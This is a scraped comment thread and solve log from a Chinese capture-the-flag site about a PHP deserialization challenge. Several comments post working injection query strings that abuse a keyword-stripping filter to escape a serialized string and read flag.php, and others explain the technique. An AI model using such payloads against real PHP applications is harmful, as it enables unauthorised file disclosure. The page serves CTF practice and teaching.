评分(1)
解题动态
ha1@! 攻破了该题 21小时前
晨曦静夜 攻破了该题 5天前
bugbiubiubiu 攻破了该题 5天前
lizhibin 攻破了该题 6天前
nnyylove 攻破了该题 8天前
低调申 攻破了该题 17天前
Jay. 攻破了该题 19天前
mechatengo 攻破了该题 1月前
i8vkmmju 攻破了该题 1月前
pinus 攻破了该题 1月前
时间不会说谎 攻破了该题 1月前
xiaodou 攻破了该题 1月前
879205607 攻破了该题 1月前
jibabenba 攻破了该题 1月前
caixinggang 攻破了该题 1月前
vx606v 攻破了该题 1月前
nihao123@ 攻破了该题 1月前
yxrw 攻破了该题 2月前
abcd7 攻破了该题 2月前
评论
KING12366 9月前
举报
Gemini3.0pro直接秒了 出现anice右键查看源码
Ethan552525 9月前
举报
/?a=flagflagflagflagflagflag&b=X%22%3Bs%3A8%3A%22password%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22b%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A1%3A%22c%22%3Bs%3A8%3A%22flaflagg.php%22%3B%7D%7D
whiteHaves 2年前
举报
参数a负责扰乱,使序列化提前结束,参数b负责反序列化之后执行代码,注意:参数b序列化的对象是A类,但只要第二个参数的序列化结果,因为第一个参数就是参数a,不必包含,但是需要用1“结束前文;文件名的长度是8,不是12,因为文件名长度只看过滤后的结果。
绝情且小帅 2年前
举报
?a=flagflagflagflagflagflag &b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}}
xiaobai568 2年前
举报
反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php
zhaiye 2年前
举报
?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}
chaoge 2年前
举报
不容易啊
2728462336 2年前
举报
注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度
hopeinhand 3年前
举报
反序列化字符逃逸